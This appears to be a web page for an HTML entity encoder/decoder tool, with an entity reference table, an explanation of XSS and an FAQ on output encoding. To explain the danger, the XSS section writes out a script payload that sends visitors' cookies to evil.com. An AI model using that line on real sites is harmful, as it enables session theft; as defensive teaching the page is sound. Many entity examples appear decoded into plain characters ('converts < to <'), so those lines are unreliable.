HTML Entity Encoder & Decoder
Encode special characters to HTML entities for safe output in web pages, or decode HTML entities back to plain text. Supports named entities (&) and numeric entities (&). Free, instant, runs entirely in your browser.
// how to use
Four steps to encode or decode HTML entities.
Select mode
Choose Encode to convert special characters to HTML entities, or Decode to convert entities back to their characters.
Paste input
Paste the raw text you want to safely embed in HTML, or the entity-encoded string you need to decode. Output updates live.
Choose options
Select Encode special chars for the five critical characters, or Encode extended to also encode non-ASCII. Choose Named or Numeric entity format.
Copy output
Click Copy to copy the encoded HTML to your clipboard. Paste it into your template, database, or code where it will be rendered as HTML.
// html entity reference
Common HTML entities — character, named entity, and numeric entity forms.
| Char | Description | Named Entity | Numeric Entity |
|---|---|---|---|
| & | Ampersand | & | & |
| < | Less than | < | < |
| > | Greater than | > | > |
| " | Double quote | " | " |
| ' | Single quote / apostrophe | ' | ' |
| Non-breaking space | |   | |
| © | Copyright sign | © | © |
| ® | Registered trademark | ® | ® |
| ™ | Trade mark sign | ™ | ™ |
| — | Em dash | — | — |
| – | En dash | – | – |
| … | Horizontal ellipsis | … | … |
| « | Left double angle quotation | « | « |
| » | Right double angle quotation | » | » |
| ← | Left arrow | ← | ← |
| → | Right arrow | → | → |
What are HTML entities?
HTML entities are special textual codes that represent characters which would otherwise be misinterpreted as HTML markup, or characters that cannot be typed directly in plain ASCII. An entity starts with an ampersand (&) and ends with a semicolon (;). They come in two forms: named entities like & (for the & character) that use a descriptive mnemonic, and numeric entities like & or & that use the Unicode code point in decimal or hexadecimal.
Why use them? HTML reserves the characters <, >, &, ", and ' for its own syntax — they delimit tags, attribute values, and entity references. If you insert user-supplied text containing these characters directly into HTML without encoding, the browser may interpret them as markup rather than as literal text. At minimum this causes rendering bugs. At worst it enables cross-site scripting (XSS) attacks, one of the most prevalent web security vulnerabilities.
XSS prevention explained: An XSS attack occurs when an attacker injects malicious script into a web page that is then executed in the browsers of other users. For example, if a comment system stores and displays user input without encoding, an attacker can submit <script>document.location='https://evil.com/?c='+document.cookie</script> and every user who views that comment will have their session cookie stolen. HTML encoding converts < to < and > to >, so the browser renders the text literally instead of executing it as code.
When to encode vs when not to: Encode user-supplied content whenever you insert it into an HTML context — page content, attribute values, JavaScript strings embedded in HTML, and URL parameters. Do not double-encode already-encoded content, and do not encode data that is stored in a database (encode at output time, not at storage time). Server-side templating engines such as Jinja2, Twig, Blade, ERB, and Thymeleaf encode by default — always check that auto-escaping is enabled rather than disabled.
// faq
Common questions about HTML entities and XSS prevention.
What are HTML entities?
HTML entities are codes used to represent characters that have special meaning in HTML or that cannot be directly included in HTML text. They begin with & and end with ;. Named entities like & use a descriptive name; numeric entities like & use the Unicode code point. Both decode to exactly the same character when rendered by a browser.
Why do I need to encode HTML special characters?
HTML uses <, >, &, ", and ' as structural syntax. If you insert text containing these characters directly into HTML without escaping, browsers parse them as markup. This causes broken layout and, critically, enables XSS attacks where injected <script> tags execute arbitrary code. Encoding these five characters into their entity equivalents is the minimum required for safe HTML output.
What is XSS and how does HTML encoding prevent it?
Cross-site scripting (XSS) is a vulnerability where an attacker injects malicious JavaScript into a page viewed by other users. For example, if a site displays a user-provided "name" without encoding and a malicious user sets their name to <script>stealData()</script>, that script runs in every visitor's browser. HTML encoding prevents this by converting < to < and > to >, making the browser display the literal text rather than interpret it as a script element.
What is the difference between named and numeric HTML entities?
Named entities use a human-readable name — & for &, < for <, © for ©. Only a specific set of characters defined by the HTML specification has named entity forms. Numeric entities use the Unicode code point: decimal (&) or hexadecimal (&). Numeric entities can represent any Unicode character. Both forms are semantically identical and produce the same rendered output in all browsers.
Should I encode all characters or just the dangerous ones?
For XSS prevention, encoding the five critical characters is both necessary and sufficient: &, <, >, ", and '. Encoding all non-ASCII characters as numeric entities is a useful extra step when targeting systems that do not support UTF-8, when generating email HTML, or when integrating with legacy parsers. For modern UTF-8 web applications, encoding just the five dangerous characters in HTML output context is the correct and recommended minimum. Always encode at output time, not storage time.
// more tools
Other free browser-based developer utilities.
Base64 Encoder / Decoder
Encode strings and binary data to Base64 and decode back. RFC 4648 compliant.
Open →URL Encoder / Decoder
Percent-encode URLs and query parameters, or decode them back to plain text.
Open →JSON Formatter
Beautify, minify, and validate JSON with syntax error highlighting.
Open →Password Generator
Generate cryptographically secure random passwords of any length.
Open →Epoch Converter
Convert Unix timestamps to readable dates and back, with code examples.
Open →